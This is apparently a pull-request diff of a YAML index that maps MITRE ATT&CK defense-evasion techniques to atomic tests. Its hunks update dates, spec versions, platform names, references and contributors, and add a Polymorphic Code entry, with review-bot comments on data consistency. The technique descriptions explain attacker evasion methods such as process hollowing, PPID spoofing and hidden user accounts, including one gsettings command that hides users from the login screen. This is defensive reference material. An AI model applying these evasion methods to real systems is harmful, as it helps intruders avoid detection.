Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8197,8 +8305,6 @@ defense-evasion:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.012:
technique:
@@ -8259,7 +8365,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.002:
technique:
@@ -8332,7 +8437,7 @@ defense-evasion:
sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true
).(Citation:
Hide GDM User Accounts) Display Managers are not anchored to specific distributions
and may be changed by a user or adversary."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T02:31:01.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Hide Artifacts: Hidden Users'
x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8361,7 +8466,6 @@ defense-evasion:
- 'User Account: User Account Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.002
atomic_tests: []
T1134.003:
@@ -8425,11 +8529,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.940Z'
name: 'Impair Defenses: Impair Command History Logging'
description: "Adversaries may impair command history logging to hide commands
they run on a compromised system. Various command interpreters keep track
@@ -8514,12 +8617,11 @@ defense-evasion:
url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1562.003
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8594,45 +8696,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -8656,6 +8723,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -8666,9 +8736,14 @@ defense-evasion:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -8678,8 +8753,35 @@ defense-evasion:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1134.004:
technique:
@@ -8736,7 +8838,7 @@ defense-evasion:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -8761,7 +8863,6 @@ defense-evasion:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1055.014:
@@ -8832,7 +8933,7 @@ defense-evasion:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -8859,11 +8960,10 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8917,7 +9017,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1574.013:
technique:
@@ -8953,7 +9052,7 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -8979,8 +9078,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.004:
technique:
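Review bot: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed from KernelCallbackTable with nothing added in their place, whereas VDSO Hijacking above keeps `x_mitre_attack_spec_version: 2.1.0` as unchanged context. The same two-line removal appears for ROMMONkit, Modify System Image, Invalid Code Signature, Run Virtual Instance, SID-History Injection and Regsvcs/Regasm. If the generator re-emits the field earlier in those objects it should show as a `+` line in the hunk; if not, these techniques lose their ATT&CK spec version. Please confirm which it is.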
@@ -9006,7 +9103,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9028,8 +9125,6 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1218.001:
technique:
@@ -9095,12 +9190,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.001
atomic_tests: []
T1070.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-13T17:15:56.948Z'
name: 'Indicator Removal on Host: Network Share Connection Removal'
description: 'Adversaries may remove share connections that are no longer useful
in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9155,7 +9249,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.005
atomic_tests: []
T1562.001:
@@ -9303,7 +9396,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.001
atomic_tests:
- name: office-365-Disable-AntiPhishRule
@@ -9374,7 +9466,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:47.635Z'
name: Modify System Image
description: |-
Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9409,8 +9501,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574:
technique:
@@ -9476,7 +9566,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.005:
technique:
@@ -9502,7 +9591,7 @@ defense-evasion:
Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:07:48.062Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Indicator Removal from Tools
x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9527,11 +9616,10 @@ defense-evasion:
- Signature-based detection
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9548,7 +9636,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -9558,7 +9645,7 @@ defense-evasion:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9567,19 +9654,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
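Review bot: the platform list for Valid Accounts drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider` (version 2.6 to 2.7); T1556.006 and T1550.004 further down get the same treatment. Any per-platform filter keyed on the old strings will now match nothing for these techniques, so check the platform-specific index generators and record the old-to-new platform mapping somewhere a consumer can find it.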
@@ -9627,11 +9712,12 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -9699,18 +9785,17 @@ defense-evasion:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1564.009:
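Review bot: the `Leitch Hollowing` reference now points at a wp-content upload on new.dc414.org instead of the autosectools.com original, with the retrieval date moved to September 12, 2024. That is a third-party mirror of the PDF rather than the publisher; acceptable if this index mirrors upstream reference data verbatim, but the PR should state that reference URLs are taken as-is from upstream and not curated here.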
@@ -9757,7 +9842,7 @@ defense-evasion:
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@
or xattr -l
commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources
folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:10:23.890Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Resource Forking
x_mitre_detection: "Identify files with the com.apple.ResourceFork
@@ -9779,7 +9864,6 @@ defense-evasion:
- Gatekeeper
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027:
technique:
@@ -9854,6 +9938,7 @@ defense-evasion:
- 'Script: Script Execution'
- 'File: File Creation'
- 'Module: Module Load'
+ - 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'File: File Metadata'
- 'Process: OS API Execution'
@@ -9913,12 +9998,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -9947,24 +10031,26 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
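Review bot: `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` are added near the top of this object and the identical values are removed from its end in the next hunk, and the T1078 object above shows the same move in the other direction (`x_mitre_modified_by_ref` removed from the middle, re-added at the bottom). That is key reordering, not a content change, and it buries the real edits; emitting keys in a fixed order in the generator would leave only the platform, version and contributor changes in the hunk.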
@@ -9999,9 +10085,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.001:
technique:
@@ -10024,7 +10107,7 @@ defense-evasion:
url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-02-10T19:52:47.724Z'
name: Invalid Code Signature
description: |-
Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -10042,8 +10125,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.006:
technique:
@@ -10082,7 +10163,7 @@ defense-evasion:
description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
- Using virtual machines to persist and evade detections. Retrieved September
22, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T22:21:59.708Z'
name: Run Virtual Instance
description: |-
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10125,10 +10206,78 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.006
atomic_tests: []
+ T1027.014:
+ technique:
+ modified: '2024-10-09T18:56:28.092Z'
+ name: Polymorphic Code
+ description: "Adversaries may utilize polymorphic code (also known as metamorphic
+ or mutating code) to evade detection. Polymorphic code is a type of software
+ capable of changing its runtime footprint during code execution.(Citation:
+ polymorphic-blackberry) With each execution of the software, the code is mutated
+ into a different version of itself that achieves the same purpose or objective
+ as the original. This functionality enables the malware to evade traditional
+ signature-based defenses, such as antivirus and antimalware tools.(Citation:
+ polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+ with polymorphic code to accomplish the intended effects, including using
+ mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+ [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+ File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+ polymorphic-medium)\n"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+ - TruKno
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ - 'File: File Creation'
+ - 'File: File Metadata'
+ x_mitre_defense_bypassed:
+ - Signature-based Detection
+ type: attack-pattern
+ id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+ created: '2024-09-27T12:28:03.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/014
+ external_id: T1027.014
+ - source_name: polymorphic-blackberry
+ description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+ 27, 2024.
+ url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+ - source_name: polymorphic-sentinelone
+ description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+ and Challenges. Retrieved September 27, 2024.
+ url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+ - source_name: polymorphic-medium
+ description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+ Retrieved September 27, 2024.'
+ url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+ - source_name: polymorphic-linkedin
+ description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+ and hindering analysis: Packing up and unpacking stuff. Retrieved September
+ 27, 2024.'
+ url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1134.005:
technique:
x_mitre_platforms:
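Review bot: style nit on the new T1027.014 entry: the description is emitted as a double-quoted scalar that ends in `\n` and carries a trailing space before the paragraph break (`polymorphic-sentinelone) \nOther`), whereas sibling entries use `|-` block scalars that strip the final newline. Worth normalizing whitespace in the generator so a description compares equal regardless of which YAML scalar style it lands in. The rest of the entry (`x_mitre_detection: ''`, `atomic_tests: []`, no `identifier:` key) matches the other test-less techniques in this file.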
@@ -10172,7 +10321,7 @@ defense-evasion:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
